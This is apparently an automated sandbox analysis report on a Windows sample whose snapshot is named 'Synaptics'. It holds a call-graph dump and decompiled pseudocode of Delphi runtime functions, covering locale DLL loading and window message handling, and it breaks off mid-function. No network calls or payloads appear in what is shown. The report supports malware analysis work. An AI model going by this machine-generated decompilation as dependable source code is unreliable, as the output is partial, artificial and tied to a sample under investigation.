4049ea 47657->47659 47658 404a10 47658->47638 47659->47658 47660 40277c 12 API calls 47659->47660 47660->47659 47661->47644 47663 43c212 47662->47663 47664 43c2ce 47663->47664 47665 43c258 47663->47665 47667 43c2e9 47663->47667 47668 43c2c3 47663->47668 47680 45b21c 119 API calls 47664->47680 47665->47667 47674 45601c 47665->47674 47667->47443 47668->47665 47669 43c32a GetKeyboardState 47668->47669 47670 43c346 47669->47670 47670->47667 47672->47443 47673->47444 47675 45602b 47674->47675 47681 454a44 47675->47681 47678 45604b 47678->47667 47680->47665 47682 454ad8 47681->47682 47684 454a68 47681->47684 47685 454ae9 47682->47685 47711 44e3bc 73 API calls 47682->47711 47684->47682 47689 458260 57 API calls 47684->47689 47695 406a70 57 API calls 47684->47695 47710 40d180 57 API calls 47684->47710 47686 454b29 47685->47686 47687 454bc1 47685->47687 47691 454b9c 47686->47691 47701 454b44 47686->47701 47688 454bdb 47687->47688 47692 454bd5 SetMenu 47687->47692 47690 454bed 47688->47690 47708 454b9a 47688->47708 47689->47684 47714 45497c 63 API calls 47690->47714 47691->47688 47698 454bb0 47691->47698 47692->47688 47695->47684 47696 454bf4 47697 4049c0 12 API calls 47696->47697 47700 454c09 47697->47700 47702 454bb9 SetMenu 47698->47702 47700->47678 47709 455f20 10 API calls 47700->47709 47701->47688 47703 454b67 GetMenu 47701->47703 47702->47688 47704 454b71 47703->47704 47705 454b8a 47703->47705 47707 454b84 SetMenu 47704->47707 47712 44e3bc 73 API calls 47705->47712 47707->47705 47708->47688 47713 455b08 65 API calls 47708->47713 47709->47678 47710->47684 47711->47685 47712->47708 47713->47690 47714->47696 47715->47455 47716->47457 47718 4597fb 47717->47718 47719 459806 SetThreadLocale 47718->47719 47721 459825 47718->47721 47722 459815 47718->47722 47743 40e2e8 75 API calls 47719->47743 47721->47462 47722->47721 47723 4587a4 38 API calls 47722->47723 47723->47721 47724->47539 47725->47466 47726->47539 47727->47539 47728->47539 47729->47514 47730->47531 47731->47532 47732->47530 47733->47539 47735 43c14c SetFocus 47734->47735 47735->47539 47736->47519 47737->47537 47738->47537 47739->47537 47740->47523 47741->47539 47742->47539 47743->47722 47744 409974 WriteFile 47745 409991 47744->47745 47746 45e750 47747 45e9bb 47746->47747 47748 45e769 47746->47748 47748->47747 47749 40275c 25 API calls 47748->47749 47753 45e8f3 47749->47753 47750 45e958 SHChangeNotifyRegister 47751 40277c 12 API calls 47750->47751 47752 45e9b3 47751->47752 47753->47750 47754 41ac6c 57 API calls 47753->47754 47754->47753 47755 434434 47758 43e6bc 47755->47758 47766 43e6ef 47758->47766 47759 43e768 GetClassInfoA 47760 43e78f 47759->47760 47761 43e7cd 47760->47761 47762 43e7a0 UnregisterClassA 47760->47762 47763 43e7ad RegisterClassA 47760->47763 47786 43e88c 47761->47786 47762->47763 47763->47761 47764 43e7c8 47763->47764 47814 40e79c 59 API calls 47764->47814 47765 406a70 57 API calls 47769 43e751 47765->47769 47766->47759 47766->47765 47772 43e71c 47766->47772 47813 40d180 57 API calls 47769->47813 47770 43e7f1 GetWindowLongA 47774 43e827 47770->47774 47775 43e806 GetWindowLongA 47770->47775 47772->47759 47789 40a1d4 47774->47789 47775->47774 47777 43e818 SetWindowLongA 47775->47777 47777->47774 47780 43e83b 47800 424e24 47780->47800 47782 43e845 47783 4049c0 12 API calls 47782->47783 47784 43445b 47783->47784 47816 407a8c 47786->47816 47788 43e7e3 47788->47770 47815 40e79c 59 API calls 47788->47815 47790 40a1e2 47789->47790 47791 40a1d8 47789->47791 47793 441a14 IsIconic 47790->47793 47792 40277c 12 API calls 47791->47792 47792->47790 47794 441a51 GetWindowRect 47793->47794 47795 441a2c GetWindowPlacement 47793->47795 47796 441a5e GetWindowLongA 47794->47796 47795->47796 47797 441a73 GetWindowLongA 47796->47797 47798 441a99 47796->47798 47797->47798 47799 441a87 ScreenToClient ScreenToClient 47797->47799 47798->47780 47799->47798 47801 424e59 47800->47801 47802 424f8c 47800->47802 47821 424168 RtlEnterCriticalSection 47801->47821 47804 4049e4 12 API calls 47802->47804 47805 424fac 47804->47805 47805->47782 47806 424f6d 47823 424174 RtlLeaveCriticalSection 47806->47823 47808 424f84 47808->47782 47809 424e63 47809->47806 47822 408f88 CompareStringA 47809->47822 47811 424f5e CreateFontIndirectA 47811->47806 47812 424efa 47812->47811 47813->47772 47814->47761 47815->47770 47820 402c0c 47816->47820 47818 407a9f CreateWindowExA 47819 407ad9 47818->47819 47819->47788 47820->47818 47821->47809 47822->47812 47823->47808 47824 4099d8 CloseHandle

                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                            Function 004061D0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                                            			E004061D0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4062d5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00406018( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040643C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004062DC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L0040131C();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401324();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L0040131C();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L0040131C();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L0040131C();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























                                                                                                                                                                                                                            0x004061d1
                                                                                                                                                                                                                            0x004061d3
                                                                                                                                                                                                                            0x004061db
                                                                                                                                                                                                                            0x004061ec
                                                                                                                                                                                                                            0x004061f1
                                                                                                                                                                                                                            0x0040620a
                                                                                                                                                                                                                            0x00406211
                                                                                                                                                                                                                            0x00406253
                                                                                                                                                                                                                            0x00406255
                                                                                                                                                                                                                            0x00406256
                                                                                                                                                                                                                            0x0040625b
                                                                                                                                                                                                                            0x0040625e
                                                                                                                                                                                                                            0x00406261
                                                                                                                                                                                                                            0x00406273
                                                                                                                                                                                                                            0x00406296
                                                                                                                                                                                                                            0x004062b6
                                                                                                                                                                                                                            0x004062b6
                                                                                                                                                                                                                            0x004062ba
                                                                                                                                                                                                                            0x004062c0
                                                                                                                                                                                                                            0x004062c3
                                                                                                                                                                                                                            0x004062c6
                                                                                                                                                                                                                            0x004062d4
                                                                                                                                                                                                                            0x00406213
                                                                                                                                                                                                                            0x00406228
                                                                                                                                                                                                                            0x0040622f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406231
                                                                                                                                                                                                                            0x00406246
                                                                                                                                                                                                                            0x0040624d
                                                                                                                                                                                                                            0x004062dc
                                                                                                                                                                                                                            0x004062e4
                                                                                                                                                                                                                            0x004062eb
                                                                                                                                                                                                                            0x004062ec
                                                                                                                                                                                                                            0x004062ff
                                                                                                                                                                                                                            0x00406304
                                                                                                                                                                                                                            0x0040630d
                                                                                                                                                                                                                            0x00406323
                                                                                                                                                                                                                            0x00406329
                                                                                                                                                                                                                            0x0040632a
                                                                                                                                                                                                                            0x00406337
                                                                                                                                                                                                                            0x0040633c
                                                                                                                                                                                                                            0x0040633b
                                                                                                                                                                                                                            0x0040633b
                                                                                                                                                                                                                            0x0040634b
                                                                                                                                                                                                                            0x00406353
                                                                                                                                                                                                                            0x00406359
                                                                                                                                                                                                                            0x0040635e
                                                                                                                                                                                                                            0x0040636b
                                                                                                                                                                                                                            0x0040636f
                                                                                                                                                                                                                            0x00406370
                                                                                                                                                                                                                            0x00406371
                                                                                                                                                                                                                            0x00406386
                                                                                                                                                                                                                            0x00406386
                                                                                                                                                                                                                            0x0040638a
                                                                                                                                                                                                                            0x004063a3
                                                                                                                                                                                                                            0x004063a7
                                                                                                                                                                                                                            0x004063a8
                                                                                                                                                                                                                            0x004063a9
                                                                                                                                                                                                                            0x004063b9
                                                                                                                                                                                                                            0x004063be
                                                                                                                                                                                                                            0x004063c2
                                                                                                                                                                                                                            0x004063c4
                                                                                                                                                                                                                            0x004063d9
                                                                                                                                                                                                                            0x004063dd
                                                                                                                                                                                                                            0x004063de
                                                                                                                                                                                                                            0x004063df
                                                                                                                                                                                                                            0x004063ef
                                                                                                                                                                                                                            0x004063f4
                                                                                                                                                                                                                            0x004063f4
                                                                                                                                                                                                                            0x004063c2
                                                                                                                                                                                                                            0x0040638a
                                                                                                                                                                                                                            0x00406353
                                                                                                                                                                                                                            0x004063fd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040624d
                                                                                                                                                                                                                            0x0040622f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0049B0CC,?,00405FC0,00400000,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0049B0CC,?,00405FC0,00400000,?,00000105,00000001), ref: 0040620A
                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0049B0CC), ref: 00406228
                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                            • API String ID: 1759228003-2375825460
                                                                                                                                                                                                                            • Opcode ID: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                                                                                                                                                                                            • Instruction ID: 811a2f83ad3c420e2a37c3e1c64e1457f6d65cd41ace4c5469d47de9f0911395
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60517375A4025C7EFB21D6A48C46FEF77AC9B04744F4100BBBA05F61C2E6789E548BA8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00459934 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 401COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 25 459934-459968 26 45999c-4599b1 call 4597e8 25->26 27 45996a-45996b 25->27 32 459a65-459a6a 26->32 33 4599b7 26->33 28 45996d-459989 call 41ac6c 27->28 59 459998-45999a 28->59 60 45998b-459993 28->60 35 459a6c 32->35 36 459abb-459ac0 32->36 37 459f03-459f18 call 45aae4 33->37 38 4599bd-4599c0 33->38 39 459a72-459a77 35->39 40 459ddb-459de3 35->40 43 459ae1-459ae6 36->43 44 459ac2 36->44 49 459fe4-459fec 37->49 41 4599c2 38->41 42 459a2c-459a2f 38->42 51 459aa2-459aa7 39->51 52 459a79 39->52 40->49 50 459de9-459df4 call 441704 40->50 53 459cc8-459ccf 41->53 54 4599c8-4599cb 41->54 55 459a31 42->55 56 459a4e-459a51 42->56 47 459f56-459f5d 43->47 48 459aec-459af2 43->48 57 459f1d-459f24 44->57 58 459ac8-459acd 44->58 68 459f70-459f7f 47->68 69 459f5f-459f6e 47->69 75 459d98-459db4 call 45ba10 48->75 76 459af8 48->76 67 45a003-45a009 49->67 50->49 105 459dfa-459e09 call 441704 IsWindowEnabled 50->105 70 459aad-459ab0 51->70 71 459e9c-459ea7 51->71 65 459e74-459e7f 52->65 66 459a7f-459a84 52->66 53->49 72 459cd5-459cdf 53->72 77 4599d1 54->77 78 459fdd-459fde call 4598ac 54->78 79 459fa7-459fb8 call 458dec call 4598ac 55->79 80 459a37-459a3a 55->80 81 459a57-459a5a 56->81 82 459b93-459ba1 call 45a038 56->82 62 459f26-459f39 call 45a5a4 57->62 63 459f3e-459f51 call 45a600 57->63 73 459ec4-459ed2 IsIconic 58->73 74 459ad3-459ad6 58->74 59->26 59->28 60->67 62->49 63->49 65->49 92 459e85-459e97 65->92 86 459a86-459a8c 66->86 87 459afd-459b0d 66->87 68->49 69->49 89 459ab6 70->89 90 459db9-459dc6 call 45a47c 70->90 71->49 94 459ead-459ebf 71->94 72->49 73->49 95 459ed8-459ee3 GetFocus 73->95 74->37 91 459adc 74->91 75->49 76->78 77->42 103 459fe3 78->103 79->49 97 459f81-459fa5 call 445ed0 call 459840 call 4598ac 80->97 98 459a40-459a43 80->98 99 459ce4-459cf0 81->99 100 459a60 81->100 82->49 106 459a92-459a97 86->106 107 459c9c-459cc3 SendMessageA 86->107 111 459b0f-459b14 87->111 112 459b18-459b20 call 45a054 87->112 89->78 90->49 144 459dcc-459dd6 90->144 91->78 92->49 94->49 95->49 114 459ee9-459ef2 call 451750 95->114 97->49 116 459bc7-459be8 call 4598ac 98->116 117 459a49 98->117 99->49 110 459cf6-459d00 99->110 100->78 103->49 105->49 147 459e0f-459e1e call 441704 IsWindowVisible 105->147 121 459a9d 106->121 122 459fba-459fc6 call 4328f8 call 4329d8 106->122 107->49 110->49 124 459d06-459d10 110->124 126 459b25-459b2d call 45a104 111->126 127 459b16-459b39 call 4598ac 111->127 112->49 114->49 153 459ef8-459efe SetFocus 114->153 145 459c0c-459c29 call 45973c PostMessageA 116->145 146 459bea-459c07 call 45974c PostMessageA 116->146 117->78 121->78 122->49 170 459fc8-459fd2 call 4328f8 call 432a34 122->170 136 459d12-459d2e call 40edc4 124->136 137 459d8b-459d93 124->137 126->49 127->49 165 459d70-459d86 GetLastError 136->165 166 459d30-459d52 GetProcAddress 136->166 137->49 144->49 145->49 146->49 147->49 168 459e24-459e6f GetFocus call 441704 SetFocus call 43c130 SetFocus 147->168 153->49 165->49 166->49 169 459d58-459d6b 166->169 168->49 169->49 170->49
                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E00459934(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				void* _t166;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t239;
				struct HWND__* _t247;
				struct HWND__* _t250;
				struct HWND__* _t254;
				struct HWND__* _t256;
				struct HWND__* _t257;
				struct HWND__* _t269;
				intOrPtr _t272;
				struct HWND__* _t275;
				intOrPtr* _t276;
				struct HWND__* _t284;
				struct HWND__* _t286;
				struct HWND__* _t297;
				void* _t306;
				signed int _t308;
				struct HWND__* _t314;
				struct HWND__* _t315;
				struct HWND__* _t316;
				void* _t317;
				intOrPtr _t340;
				struct HWND__* _t344;
				intOrPtr _t366;
				void* _t370;
				struct HWND__* _t375;
				void* _t376;
				void* _t377;
				intOrPtr _t378;

				_t317 = __ecx;
				_push(_t370);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x459fee);
				_push( *[fs:edx]);
				 *[fs:edx] = _t378;
				 *(_v12 + 0xc) = 0;
				_t306 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t306 < 0) {
					L5:
					E004597E8(_v8, _t317, _v12);
					_t308 =  *_v12;
					_t161 = _t308;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L102:
									_t166 = 0;
									_pop(_t340);
									 *[fs:eax] = _t340;
									goto L103;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E0045BA10(_v8,  *(_v12 + 8), _t308) & 0x0000007f;
								} else {
									L101:
									E004598AC(_t377); // executed
								}
								goto L102;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E0045A600(_v8, _t317,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E0045A5A4(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L102;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t344 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t344 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t344 + 0x30))) {
										_t191 = E00451750(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L102;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L89:
								E0045AAE4(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t372 = _t197;
								_t199 = E00441704(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E00441704(_t372));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E00441704(_t372));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x49be6c = 0;
											_t206 = GetFocus();
											SetFocus(E00441704(_t372));
											E0043C130(_t372,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x49be6c = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L102;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0x10a));
								if( *((short*)(_t217 + 0x10a)) != 0) {
									 *((intOrPtr*)(_v8 + 0x108))();
								}
								goto L102;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E0045A47C(_v8, _t317, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0x112));
							if( *((short*)(_t224 + 0x112)) != 0) {
								 *((intOrPtr*)(_v8 + 0x110))();
							}
							goto L102;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E0045A054(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E0045A104(_v8);
								} else {
									E004598AC(_t377);
								}
							}
							goto L102;
						}
						_t239 = _t227 + 0xffffffe0 - 7;
						__eflags = _t239;
						if(_t239 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t308 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L102;
						}
						__eflags = _t239 == 0x1e1;
						if(_t239 == 0x1e1) {
							_t247 = E004329D8(E004328F8());
							__eflags = _t247;
							if(_t247 != 0) {
								E00432A34(E004328F8());
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						goto L89;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t250 = _t161 - 0x37;
							__eflags = _t250;
							if(_t250 == 0) {
								 *(_v12 + 0xc) = E0045A038(_v8);
								goto L102;
							}
							__eflags = _t250 == 0x13;
							if(_t250 == 0x13) {
								_t254 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
									_t256 = _v8;
									__eflags =  *((char*)(_t256 + 0x9e));
									if( *((char*)(_t256 + 0x9e)) != 0) {
										_t257 = _v8;
										__eflags =  *(_t257 + 0xa0);
										if( *(_t257 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t314 = E0040EDC4("vcltest3.dll", _t308, 0x8000);
											 *(_v8 + 0xa0) = _t314;
											__eflags = _t314;
											if(_t314 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t375 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_t315 = _t375;
												__eflags = _t375;
												if(_t375 != 0) {
													_t269 =  *(_v12 + 8);
													_t315->i( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8)));
												}
											}
										}
									}
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t272 =  *0x49ebbc; // 0x21e1320
							E00458DEC(_t272);
							E004598AC(_t377);
							goto L102;
						}
						_t275 = _t161 - 0x1a;
						__eflags = _t275;
						if(_t275 == 0) {
							_t276 =  *0x49ddb0; // 0x49eb18
							E00445ED0( *_t276, _t317,  *(_v12 + 4));
							E00459840(_v8, _t308, _t317, _v12, _t370);
							E004598AC(_t377);
							goto L102;
						}
						__eflags = _t275 == 2;
						if(_t275 == 2) {
							E004598AC(_t377);
							_t284 = _v12;
							__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t284 + 1;
							_t286 = _v12;
							__eflags =  *(_t286 + 4);
							if( *(_t286 + 4) == 0) {
								E0045973C();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E0045974C(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						_t297 = _v12;
						__eflags =  *(_t297 + 4);
						if( *(_t297 + 4) != 0) {
							 *((char*)(_v8 + 0x9c)) = 1;
						}
						goto L102;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L101;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M004599D8))) {
						case 0:
							0 = E004214B8(0, __ebx, __edi, __esi);
							goto L102;
						case 1:
							goto L101;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L00407848();
							__eax = E004598AC(__ebp);
							goto L102;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
